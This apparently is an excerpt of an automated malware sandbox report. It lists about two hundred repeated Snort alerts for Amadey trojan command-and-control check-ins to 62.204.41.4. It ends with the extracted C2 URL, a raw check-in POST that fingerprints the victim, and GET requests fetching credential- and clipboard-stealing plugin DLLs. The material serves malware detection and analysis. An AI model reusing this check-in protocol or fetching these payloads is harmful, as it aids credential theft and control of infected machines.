                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49976 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49977 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49978 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49979 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49980 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49981 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49982 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49983 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49984 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49985 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49986 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49987 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49988 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49989 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49990 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49991 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49992 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49993 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49994 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49995 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49996 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49997 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49998 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49999 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50000 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50001 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50002 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50003 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50004 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50005 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50006 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50007 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50008 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50009 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50010 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50011 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50012 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50013 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50014 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50015 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50016 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50017 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50018 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50019 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50020 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50021 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50022 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50023 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50024 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50025 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50026 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50027 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50028 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50029 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50030 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50031 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50032 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50033 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50034 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50035 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50036 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50037 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50038 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50039 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50040 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50041 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50042 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50043 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50044 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50045 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50046 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50047 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50048 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50049 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50050 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50051 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50052 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50053 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50054 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50055 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50056 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50057 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50058 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50059 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50060 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50061 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50062 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50063 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50064 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50065 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50066 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50067 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50068 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50069 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50070 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50071 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50072 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50073 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50074 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50075 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50076 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50077 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50078 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50079 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50080 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50081 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50082 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50083 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50084 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50085 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50086 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50087 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50088 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50089 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50090 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50091 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50092 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50093 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50094 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50095 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50096 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50097 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50098 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50099 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50100 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50101 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50102 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50103 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50104 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50105 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50106 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50107 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50108 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50109 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50110 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50111 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50112 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50113 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50114 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50115 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50116 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50117 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50118 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50119 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50120 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50121 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50122 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50123 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50124 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50125 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50126 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50127 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50128 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50129 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50130 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50131 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50132 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50133 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50134 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50135 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50136 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50137 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50138 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50139 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50140 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50141 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50142 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50143 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50144 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50145 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50146 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50147 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50148 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50149 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50150 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50151 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50152 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50153 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50154 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50155 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50156 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50157 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50158 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50159 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50160 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50161 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50162 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50163 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50164 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50165 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50166 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50167 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50168 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50169 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50170 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50171 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50172 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50173 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50174 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50175 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50176 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50177 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50178 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50179 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50180 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50181 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50182 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50183 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50184 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50185 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50186 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50187 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50188 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50189 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50190 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50191 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50192 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50193 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50194 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50195 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50196 -> 62.204.41.4:80
                              Source: Malware configuration extractorURLs: 62.204.41.4/Gol478Ns/index.php
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
                              Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4
